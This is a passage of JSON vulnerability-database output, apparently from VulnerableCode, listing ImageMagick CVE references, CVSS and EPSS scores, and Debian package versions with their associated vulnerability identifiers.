"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/issues/1533", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/ImageMagick/ImageMagick/issues/1533" }, { "reference_url": "https://www.debian.org/security/2020/dsa-4712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://www.debian.org/security/2020/dsa-4712" }, { "reference_url": "http://www.securityfocus.com/bid/107645", "reference_id": "", "reference_type": "", "scores": [], "url": "http://www.securityfocus.com/bid/107645" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1700417", "reference_id": "1700417", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1700417" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:7.0.8-36:q16:*:*:*:*:*:*", "reference_id": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-36:q16:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:7.0.8-36:q16:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10649", "reference_id": "CVE-2019-10649", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:M/Au:N/C:N/I:N/A:P" }, { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10649" }, { "reference_url": "https://usn.ubuntu.com/4034-1/", "reference_id": "USN-4034-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4034-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-10649" ], "risk_score": 2.5, "exploitability": "0.5", "weighted_severity": "5.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-p3vh-b6jn-f3e2" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49492?format=api", "vulnerability_id": "VCID-p4yb-mqca-v7c8", "summary": "Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-4219.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-4219.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-4219", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00095", "scoring_system": "epss", "scoring_elements": "0.26544", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00095", "scoring_system": "epss", "scoring_elements": "0.26594", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00095", "scoring_system": "epss", "scoring_elements": "0.26639", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00095", "scoring_system": "epss", "scoring_elements": "0.26424", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00095", "scoring_system": "epss", "scoring_elements": "0.26493", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00095", "scoring_system": "epss", "scoring_elements": "0.26542", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00095", "scoring_system": "epss", "scoring_elements": "0.26549", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00095", "scoring_system": "epss", "scoring_elements": "0.26503", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00095", "scoring_system": "epss", "scoring_elements": "0.26446", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00095", "scoring_system": "epss", "scoring_elements": "0.26452", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00095", "scoring_system": "epss", "scoring_elements": "0.26423", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00095", "scoring_system": "epss", "scoring_elements": "0.26388", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00095", "scoring_system": "epss", "scoring_elements": "0.26322", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-4219" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4219", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4219" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1013282", "reference_id": "1013282", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1013282" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2054611", "reference_id": "2054611", "reference_type": "", 